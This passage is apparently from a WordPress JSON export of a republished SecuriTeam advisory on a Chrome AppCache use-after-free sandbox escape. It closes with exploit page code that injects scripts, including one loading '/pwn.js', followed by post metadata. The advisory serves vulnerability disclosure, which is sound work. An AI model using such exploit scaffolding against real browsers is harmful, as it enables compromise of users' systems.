class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;script&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">innerHTML<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">js<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-73\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-75\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go_plain<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;script&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setAttribute<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;src&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/pwn.js&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-79\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-81\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0164 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3786\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:23:16 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The vulnerability exists in the AppCache subsystem in Chrome Versions 69.0 and before. This code is located in the privileged browser process outside of the sandbox. The renderer interacts with this subsystem by sending IPC messages from the renderer to the browser process. These messages can cause the browser to make network requests, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3786\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome AppCache Subsystem SBX by utilizing a Use After Free<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15244,10757,13145],"class_list":["post-13714","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-sandbox-escape","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13714"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13714\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13714"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}